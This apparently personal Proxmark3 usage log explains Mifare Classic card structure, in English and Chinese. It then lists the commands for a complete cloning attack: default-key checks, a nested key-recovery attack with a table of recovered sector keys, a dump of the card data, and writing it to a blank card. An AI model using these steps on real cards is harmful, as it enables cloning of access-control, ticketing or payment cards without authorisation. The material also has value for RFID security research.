Proxmark3 Usage Log

What is proxmark3

The Proxmark III is a device developed by Jonathan Westhues that enables sniffing, reading and cloning of RFID (Radio Frequency Identification) tags. For my master thesis I wanted to look at the communication of Mifare Classic cards. Mifare Classic is used in many applications and is the most popular contactless card around. It is used in e-ticketing, public transport and access control. The higher-level protocol is kept secret by the manufacturer (NXP). I made an implementation of the ISO14443 type A standard for the Proxmark since Mifare is based on this communication standard.

• http://www.proxmark.org/?proxmark
• https://github.com/Proxmark/proxmark3
• https://www.kali.org/

what is M1 Card

M1卡有从0-15共16个扇区，每个扇区配备了从0-3共4个段，每个段可以保存16字节的内容。每个扇区的03段是用来保存KeyA，KeyB和控制位的，因为M1卡允许每个扇区有一对独立的密码护，这样能够更加灵活的控制数据的操作，控制位就是这个扇区各种详细权限计算出来的结果。每张M1卡都有一个全球唯一的UID号，这个UID号保存在卡的00扇区的00段，也称为厂商段，其中前4个字节是卡的UID，第5个字节是卡UID的校验位，剩下的是厂商数据。并且这个段在出厂之前就会被设置了写入保护，只能读取不能修改，当然也有例外，有种叫UID卡的特殊卡，UID是没有设置保护的，其实就是厂家不按规范生产的卡。

Logs

// 查看天线工作状态和频率
proxmark3> hw tune

// 按照14a标准读取卡片
proxmark3> hf 14a reader

// 用默认key测试现有分区
proxmark3> hf mf chk *1 ? t

// 用第7block的默认key嗅探秘钥
proxmark3> hf mf nested o 0x07 1 ffffffffffff 1 A

// 利用嗅探出来的key dump所有分区的key
proxmark3> hf mf nested 1 0 A c5f2251a1111 d

|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  bf1ebb3a1111  | 1 |  bf1ebb3a1111  | 1 |          
|001|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|002|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|003|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|004|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|005|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|006|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|007|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|008|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|009|  863ffa384048  | 1 |  1834746affe8  | 1 |          
|010|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|011|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|012|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|013|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|014|  ffffffffffff  | 1 |  ffffffffffff  | 1 |          
|015|  201409032014  | 1 |  ef53cad2923f  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...  

// 用 dumpkeys.bin 读取卡内加密数据
proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED 

exit

do something here...

// 转换数据用于克隆卡片
python pm3_mfd2eml.py dumpdata.bin test.eml

// 克隆数据到新卡片
proxmark3> hf mf cload test


#####################################################################